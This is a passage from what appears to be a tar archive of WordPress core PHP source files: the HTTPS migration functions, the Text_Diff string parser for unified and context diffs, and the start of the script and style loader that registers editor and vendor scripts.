/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260607003752.php 0000666 00000011205 15224151221 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
string-20260621203019.php 0000666 00000020233 15224151221 0010141 0 ustar 00 <?php
/**
* Parses unified or context diffs output from eg. the diff utility.
*
* Example:
* <code>
* $patch = file_get_contents('example.patch');
* $diff = new Text_Diff('string', array($patch));
* $renderer = new Text_Diff_Renderer_inline();
* echo $renderer->render($diff);
* </code>
*
* Copyright 2005 Örjan Persson <o@42mm.org>
* Copyright 2005-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see https://opensource.org/license/lgpl-2-1/.
*
* @author Örjan Persson <o@42mm.org>
* @package Text_Diff
* @since 0.2.0
*/
class Text_Diff_Engine_string {
/**
* Parses a unified or context diff.
*
* First param contains the whole diff and the second can be used to force
* a specific diff type. If the second parameter is 'autodetect', the
* diff will be examined to find out which type of diff this is.
*
* @param string $diff The diff content.
* @param string $mode The diff mode of the content in $diff. One of
* 'context', 'unified', or 'autodetect'.
*
* @return array List of all diff operations.
*/
function diff($diff, $mode = 'autodetect')
{
// Detect line breaks.
$lnbr = "\n";
if (strpos($diff, "\r\n") !== false) {
$lnbr = "\r\n";
} elseif (strpos($diff, "\r") !== false) {
$lnbr = "\r";
}
// Make sure we have a line break at the EOF.
if (substr($diff, -strlen($lnbr)) != $lnbr) {
$diff .= $lnbr;
}
if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') {
return PEAR::raiseError('Type of diff is unsupported');
}
if ($mode == 'autodetect') {
$context = strpos($diff, '***');
$unified = strpos($diff, '---');
if ($context === $unified) {
return PEAR::raiseError('Type of diff could not be detected');
} elseif ($context === false || $unified === false) {
$mode = $context !== false ? 'context' : 'unified';
} else {
$mode = $context < $unified ? 'context' : 'unified';
}
}
// Split by new line and remove the diff header, if there is one.
$diff = explode($lnbr, $diff);
if (($mode == 'context' && strpos($diff[0], '***') === 0) ||
($mode == 'unified' && strpos($diff[0], '---') === 0)) {
array_shift($diff);
array_shift($diff);
}
if ($mode == 'context') {
return $this->parseContextDiff($diff);
} else {
return $this->parseUnifiedDiff($diff);
}
}
/**
* Parses an array containing the unified diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseUnifiedDiff($diff)
{
$edits = array();
$end = count($diff) - 1;
for ($i = 0; $i < $end;) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case ' ':
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == ' ');
$edits[] = new Text_Diff_Op_copy($diff1);
break;
case '+':
// get all new lines
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
// get changed or removed lines
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '-');
while ($i < $end && substr($diff[$i], 0, 1) == '+') {
$diff2[] = substr($diff[$i++], 1);
}
if (count($diff2) == 0) {
$edits[] = new Text_Diff_Op_delete($diff1);
} else {
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
}
break;
default:
$i++;
break;
}
}
return $edits;
}
/**
* Parses an array containing the context diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseContextDiff(&$diff)
{
$edits = array();
$i = $max_i = $j = $max_j = 0;
$end = count($diff) - 1;
while ($i < $end && $j < $end) {
while ($i >= $max_i && $j >= $max_j) {
// Find the boundaries of the diff output of the two files
for ($i = $j;
$i < $end && substr($diff[$i], 0, 3) == '***';
$i++);
for ($max_i = $i;
$max_i < $end && substr($diff[$max_i], 0, 3) != '---';
$max_i++);
for ($j = $max_i;
$j < $end && substr($diff[$j], 0, 3) == '---';
$j++);
for ($max_j = $j;
$max_j < $end && substr($diff[$max_j], 0, 3) != '***';
$max_j++);
}
// find what hasn't been changed
$array = array();
while ($i < $max_i &&
$j < $max_j &&
strcmp($diff[$i], $diff[$j]) == 0) {
$array[] = substr($diff[$i], 2);
$i++;
$j++;
}
while ($i < $max_i && ($max_j-$j) <= 1) {
if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$i++], 2);
}
while ($j < $max_j && ($max_i-$i) <= 1) {
if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$j++], 2);
}
if (count($array) > 0) {
$edits[] = new Text_Diff_Op_copy($array);
}
if ($i < $max_i) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case '!':
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 2);
if ($j < $max_j && substr($diff[$j], 0, 1) == '!') {
$diff2[] = substr($diff[$j++], 2);
}
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '!');
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
break;
case '+':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff1);
break;
}
}
if ($j < $max_j) {
$diff2 = array();
switch (substr($diff[$j], 0, 1)) {
case '+':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff2);
break;
case '-':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff2);
break;
}
}
}
return $edits;
}
}
script-loader-20260605041519-20260621171211.php 0000666 00000465210 15224151221 0012777 0 ustar 00 <?php
/**
* WordPress scripts and styles default loader.
*
* Several constants are used to manage the loading, concatenating and compression of scripts and CSS:
* define('SCRIPT_DEBUG', true); loads the development (non-minified) versions of all scripts and CSS, and disables compression and concatenation,
* define('CONCATENATE_SCRIPTS', false); disables compression and concatenation of scripts and CSS,
* define('COMPRESS_SCRIPTS', false); disables compression of scripts,
* define('COMPRESS_CSS', false); disables compression of CSS,
* define('ENFORCE_GZIP', true); forces gzip for compression (default is deflate).
*
* The globals $concatenate_scripts, $compress_scripts and $compress_css can be set by plugins
* to temporarily override the above settings. Also a compression test is run once and the result is saved
* as option 'can_compress_scripts' (0/1). The test will run again if that option is deleted.
*
* @package WordPress
*/
/** WordPress Dependency Class */
require ABSPATH . WPINC . '/class-wp-dependency.php';
/** WordPress Dependencies Class */
require ABSPATH . WPINC . '/class-wp-dependencies.php';
/** WordPress Scripts Class */
require ABSPATH . WPINC . '/class-wp-scripts.php';
/** WordPress Scripts Functions */
require ABSPATH . WPINC . '/functions.wp-scripts.php';
/** WordPress Styles Class */
require ABSPATH . WPINC . '/class-wp-styles.php';
/** WordPress Styles Functions */
require ABSPATH . WPINC . '/functions.wp-styles.php';
/**
* Registers TinyMCE scripts.
*
* @since 5.0.0
*
* @global string $tinymce_version
* @global bool $concatenate_scripts
* @global bool $compress_scripts
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param bool $force_uncompressed Whether to forcibly prevent gzip compression. Default false.
*/
function wp_register_tinymce_scripts( $scripts, $force_uncompressed = false ) {
global $tinymce_version, $concatenate_scripts, $compress_scripts;
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
script_concat_settings();
$compressed = $compress_scripts && $concatenate_scripts && ! $force_uncompressed;
/*
* Load tinymce.js when running from /src, otherwise load wp-tinymce.js (in production)
* or tinymce.min.js (when SCRIPT_DEBUG is true).
*/
if ( $compressed ) {
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . 'wp-tinymce.js', array(), $tinymce_version );
} else {
$scripts->add( 'wp-tinymce-root', includes_url( 'js/tinymce/' ) . "tinymce$dev_suffix.js", array(), $tinymce_version );
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . "plugins/compat3x/plugin$dev_suffix.js", array( 'wp-tinymce-root' ), $tinymce_version );
}
$scripts->add( 'wp-tinymce-lists', includes_url( "js/tinymce/plugins/lists/plugin$suffix.js" ), array( 'wp-tinymce' ), $tinymce_version );
}
/**
* Registers all the WordPress vendor scripts that are in the standardized
* `js/dist/vendor/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_vendor( $scripts ) {
global $wp_locale;
$suffix = wp_scripts_get_suffix();
$vendor_scripts = array(
'react',
'react-dom' => array( 'react' ),
'react-jsx-runtime' => array( 'react' ),
'regenerator-runtime',
'moment',
'lodash',
'wp-polyfill-fetch',
'wp-polyfill-formdata',
'wp-polyfill-node-contains',
'wp-polyfill-url',
'wp-polyfill-dom-rect',
'wp-polyfill-element-closest',
'wp-polyfill-object-fit',
'wp-polyfill-inert',
'wp-polyfill',
);
$vendor_scripts_versions = array(
'react' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-dom' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-jsx-runtime' => '18.3.1',
'regenerator-runtime' => '0.14.1',
'moment' => '2.30.1',
'lodash' => '4.17.21',
'wp-polyfill-fetch' => '3.6.20',
'wp-polyfill-formdata' => '4.0.10',
'wp-polyfill-node-contains' => '4.8.0',
'wp-polyfill-url' => '3.6.4',
'wp-polyfill-dom-rect' => '4.8.0',
'wp-polyfill-element-closest' => '3.0.2',
'wp-polyfill-object-fit' => '2.3.5',
'wp-polyfill-inert' => '3.1.3',
'wp-polyfill' => '3.15.0',
);
foreach ( $vendor_scripts as $handle => $dependencies ) {
if ( is_string( $dependencies ) ) {
$handle = $dependencies;
$dependencies = array();
}
$path = "/wp-includes/js/dist/vendor/$handle$suffix.js";
$version = $vendor_scripts_versions[ $handle ];
$scripts->add( $handle, $path, $dependencies, $version, 1 );
}
did_action( 'init' ) && $scripts->add_inline_script( 'lodash', 'window.lodash = _.noConflict();' );
did_action( 'init' ) && $scripts->add_inline_script(
'moment',
sprintf(
"moment.updateLocale( '%s', %s );",
esc_js( get_user_locale() ),
wp_json_encode(
array(
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'week' => array(
'dow' => (int) get_option( 'start_of_week', 0 ),
),
'longDateFormat' => array(
'LT' => get_option( 'time_format', __( 'g:i a' ) ),
'LTS' => null,
'L' => null,
'LL' => get_option( 'date_format', __( 'F j, Y' ) ),
'LLL' => __( 'F j, Y g:i a' ),
'LLLL' => null,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
}
/**
* Returns contents of an inline script used in appending polyfill scripts for
* browsers which fail the provided tests. The provided array is a mapping from
* a condition to verify feature support to its polyfill script handle.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param string[] $tests Features to detect.
* @return string Conditional polyfill inline script.
*/
function wp_get_script_polyfill( $scripts, $tests ) {
$polyfill = '';
foreach ( $tests as $test => $handle ) {
if ( ! array_key_exists( $handle, $scripts->registered ) ) {
continue;
}
$src = $scripts->registered[ $handle ]->src;
$ver = $scripts->registered[ $handle ]->ver;
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $scripts->content_url && str_starts_with( $src, $scripts->content_url ) ) ) {
$src = $scripts->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
continue;
}
$polyfill .= (
// Test presence of feature...
'( ' . $test . ' ) || ' .
/*
* ...appending polyfill on any failures. Cautious viewers may balk
* at the `document.write`. Its caveat of synchronous mid-stream
* blocking write is exactly the behavior we need though.
*/
'document.write( \'<script src="' .
$src .
'"></scr\' + \'ipt>\' );'
);
}
return $polyfill;
}
/**
* Registers development scripts that integrate with `@wordpress/scripts`.
*
* @see https://github.com/WordPress/gutenberg/tree/trunk/packages/scripts#start
*
* @since 6.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_register_development_scripts( $scripts ) {
if (
! defined( 'SCRIPT_DEBUG' ) || ! SCRIPT_DEBUG
|| empty( $scripts->registered['react'] )
|| defined( 'WP_RUN_CORE_TESTS' )
) {
return;
}
$development_scripts = array(
'react-refresh-entry',
'react-refresh-runtime',
);
foreach ( $development_scripts as $script_name ) {
$assets = include ABSPATH . WPINC . '/assets/script-loader-' . $script_name . '.php';
if ( ! is_array( $assets ) ) {
return;
}
$scripts->add(
'wp-' . $script_name,
'/wp-includes/js/dist/development/' . $script_name . '.js',
$assets['dependencies'],
$assets['version']
);
}
// See https://github.com/pmmmwh/react-refresh-webpack-plugin/blob/main/docs/TROUBLESHOOTING.md#externalising-react.
$scripts->registered['react']->deps[] = 'wp-react-refresh-entry';
}
/**
* Registers all the WordPress packages scripts that are in the standardized
* `js/dist/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_scripts( $scripts ) {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'a11y.js' => array('dependencies' => array(...), 'version' => '...'),
* 'annotations.js' => array('dependencies' => array(...), 'version' => '...'),
* 'api-fetch.js' => array(...
*/
$assets = include ABSPATH . WPINC . "/assets/script-loader-packages{$suffix}.php";
foreach ( $assets as $file_name => $package_data ) {
$basename = str_replace( $suffix . '.js', '', basename( $file_name ) );
$handle = 'wp-' . $basename;
$path = "/wp-includes/js/dist/{$basename}{$suffix}.js";
if ( ! empty( $package_data['dependencies'] ) ) {
$dependencies = $package_data['dependencies'];
} else {
$dependencies = array();
}
// Add dependencies that cannot be detected and generated by build tools.
switch ( $handle ) {
case 'wp-block-library':
array_push( $dependencies, 'editor' );
break;
case 'wp-edit-post':
array_push( $dependencies, 'media-models', 'media-views', 'postbox', 'wp-dom-ready' );
break;
case 'wp-preferences':
array_push( $dependencies, 'wp-preferences-persistence' );
break;
}
$scripts->add( $handle, $path, $dependencies, $package_data['version'], 1 );
if ( in_array( 'wp-i18n', $dependencies, true ) ) {
$scripts->set_translations( $handle );
}
/*
* Manually set the text direction localization after wp-i18n is printed.
* This ensures that wp.i18n.isRTL() returns true in RTL languages.
* We cannot use $scripts->set_translations( 'wp-i18n' ) to do this
* because WordPress prints a script's translations *before* the script,
* which means, in the case of wp-i18n, that wp.i18n.setLocaleData()
* is called before wp.i18n is defined.
*/
if ( 'wp-i18n' === $handle ) {
$ltr = _x( 'ltr', 'text direction' );
$script = sprintf( "wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ '%s' ] } );", $ltr );
$scripts->add_inline_script( $handle, $script, 'after' );
}
}
}
/**
* Adds inline scripts required for the WordPress JavaScript packages.
*
* @since 5.0.0
* @since 6.4.0 Added relative time strings for the `wp-date` inline script output.
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_inline_scripts( $scripts ) {
global $wp_locale, $wpdb;
if ( isset( $scripts->registered['wp-api-fetch'] ) ) {
$scripts->registered['wp-api-fetch']->deps[] = 'wp-hooks';
}
$scripts->add_inline_script(
'wp-api-fetch',
sprintf(
'wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "%s" ) );',
sanitize_url( get_rest_url() )
),
'after'
);
$scripts->add_inline_script(
'wp-api-fetch',
implode(
"\n",
array(
sprintf(
'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "%s" );',
wp_installing() ? '' : wp_create_nonce( 'wp_rest' )
),
'wp.apiFetch.use( wp.apiFetch.nonceMiddleware );',
'wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );',
sprintf(
'wp.apiFetch.nonceEndpoint = "%s";',
admin_url( 'admin-ajax.php?action=rest-nonce' )
),
)
),
'after'
);
$meta_key = $wpdb->get_blog_prefix() . 'persisted_preferences';
$user_id = get_current_user_id();
$preload_data = get_user_meta( $user_id, $meta_key, true );
$scripts->add_inline_script(
'wp-preferences',
sprintf(
'( function() {
var serverData = %s;
var userId = "%d";
var persistenceLayer = wp.preferencesPersistence.__unstableCreatePersistenceLayer( serverData, userId );
var preferencesStore = wp.preferences.store;
wp.data.dispatch( preferencesStore ).setPersistenceLayer( persistenceLayer );
} ) ();',
wp_json_encode( $preload_data, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
$user_id
)
);
// Backwards compatibility - configure the old wp-data persistence system.
$scripts->add_inline_script(
'wp-data',
implode(
"\n",
array(
'( function() {',
' var userId = ' . get_current_user_id() . ';',
' var storageKey = "WP_DATA_USER_" + userId;',
' wp.data',
' .use( wp.data.plugins.persistence, { storageKey: storageKey } );',
'} )();',
)
)
);
// Calculate the timezone abbr (EDT, PST) if possible.
$timezone_string = get_option( 'timezone_string', 'UTC' );
$timezone_abbr = '';
if ( ! empty( $timezone_string ) ) {
$timezone_date = new DateTime( 'now', new DateTimeZone( $timezone_string ) );
$timezone_abbr = $timezone_date->format( 'T' );
}
$gmt_offset = get_option( 'gmt_offset', 0 );
$scripts->add_inline_script(
'wp-date',
sprintf(
'wp.date.setSettings( %s );',
wp_json_encode(
array(
'l10n' => array(
'locale' => get_user_locale(),
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'meridiem' => (object) $wp_locale->meridiem,
'relative' => array(
/* translators: %s: Duration. */
'future' => __( '%s from now' ),
/* translators: %s: Duration. */
'past' => __( '%s ago' ),
/* translators: One second from or to a particular datetime, e.g., "a second ago" or "a second from now". */
's' => __( 'a second' ),
/* translators: %d: Duration in seconds from or to a particular datetime, e.g., "4 seconds ago" or "4 seconds from now". */
'ss' => __( '%d seconds' ),
/* translators: One minute from or to a particular datetime, e.g., "a minute ago" or "a minute from now". */
'm' => __( 'a minute' ),
/* translators: %d: Duration in minutes from or to a particular datetime, e.g., "4 minutes ago" or "4 minutes from now". */
'mm' => __( '%d minutes' ),
/* translators: One hour from or to a particular datetime, e.g., "an hour ago" or "an hour from now". */
'h' => __( 'an hour' ),
/* translators: %d: Duration in hours from or to a particular datetime, e.g., "4 hours ago" or "4 hours from now". */
'hh' => __( '%d hours' ),
/* translators: One day from or to a particular datetime, e.g., "a day ago" or "a day from now". */
'd' => __( 'a day' ),
/* translators: %d: Duration in days from or to a particular datetime, e.g., "4 days ago" or "4 days from now". */
'dd' => __( '%d days' ),
/* translators: One month from or to a particular datetime, e.g., "a month ago" or "a month from now". */
'M' => __( 'a month' ),
/* translators: %d: Duration in months from or to a particular datetime, e.g., "4 months ago" or "4 months from now". */
'MM' => __( '%d months' ),
/* translators: One year from or to a particular datetime, e.g., "a year ago" or "a year from now". */
'y' => __( 'a year' ),
/* translators: %d: Duration in years from or to a particular datetime, e.g., "4 years ago" or "4 years from now". */
'yy' => __( '%d years' ),
),
'startOfWeek' => (int) get_option( 'start_of_week', 0 ),
),
'formats' => array(
/* translators: Time format, see https://www.php.net/manual/datetime.format.php */
'time' => get_option( 'time_format', __( 'g:i a' ) ),
/* translators: Date format, see https://www.php.net/manual/datetime.format.php */
'date' => get_option( 'date_format', __( 'F j, Y' ) ),
/* translators: Date/Time format, see https://www.php.net/manual/datetime.format.php */
'datetime' => __( 'F j, Y g:i a' ),
/* translators: Abbreviated date/time format, see https://www.php.net/manual/datetime.format.php */
'datetimeAbbreviated' => __( 'M j, Y g:i a' ),
),
'timezone' => array(
'offset' => (float) $gmt_offset,
'offsetFormatted' => str_replace( array( '.25', '.5', '.75' ), array( ':15', ':30', ':45' ), (string) $gmt_offset ),
'string' => $timezone_string,
'abbr' => $timezone_abbr,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
// Loading the old editor and its config to ensure the classic block works as expected.
$scripts->add_inline_script(
'editor',
'window.wp.oldEditor = window.wp.editor;',
'after'
);
/*
* wp-editor module is exposed as window.wp.editor.
* Problem: there is quite some code expecting window.wp.oldEditor object available under window.wp.editor.
* Solution: fuse the two objects together to maintain backward compatibility.
* For more context, see https://github.com/WordPress/gutenberg/issues/33203.
*/
$scripts->add_inline_script(
'wp-editor',
'Object.assign( window.wp.editor, window.wp.oldEditor );',
'after'
);
}
/**
* Adds inline scripts required for the TinyMCE in the block editor.
*
* These TinyMCE init settings are used to extend and override the default settings
* from `_WP_Editors::default_settings()` for the Classic block.
*
* @since 5.0.0
*
* @global WP_Scripts $wp_scripts
*/
function wp_tinymce_inline_scripts() {
global $wp_scripts;
/** This filter is documented in wp-includes/class-wp-editor.php */
$editor_settings = apply_filters( 'wp_editor_settings', array( 'tinymce' => true ), 'classic-block' );
$tinymce_plugins = array(
'charmap',
'colorpicker',
'hr',
'lists',
'media',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wpdialogs',
'wptextpattern',
'wpview',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_plugins = apply_filters( 'tiny_mce_plugins', $tinymce_plugins, 'classic-block' );
$tinymce_plugins = array_unique( $tinymce_plugins );
$disable_captions = false;
// Runs after `tiny_mce_plugins` but before `mce_buttons`.
/** This filter is documented in wp-admin/includes/media.php */
if ( apply_filters( 'disable_captions', '' ) ) {
$disable_captions = true;
}
$toolbar1 = array(
'formatselect',
'bold',
'italic',
'bullist',
'numlist',
'blockquote',
'alignleft',
'aligncenter',
'alignright',
'link',
'unlink',
'wp_more',
'spellchecker',
'wp_add_media',
'wp_adv',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar1 = apply_filters( 'mce_buttons', $toolbar1, 'classic-block' );
$toolbar2 = array(
'strikethrough',
'hr',
'forecolor',
'pastetext',
'removeformat',
'charmap',
'outdent',
'indent',
'undo',
'redo',
'wp_help',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar2 = apply_filters( 'mce_buttons_2', $toolbar2, 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar3 = apply_filters( 'mce_buttons_3', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar4 = apply_filters( 'mce_buttons_4', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$external_plugins = apply_filters( 'mce_external_plugins', array(), 'classic-block' );
$tinymce_settings = array(
'plugins' => implode( ',', $tinymce_plugins ),
'toolbar1' => implode( ',', $toolbar1 ),
'toolbar2' => implode( ',', $toolbar2 ),
'toolbar3' => implode( ',', $toolbar3 ),
'toolbar4' => implode( ',', $toolbar4 ),
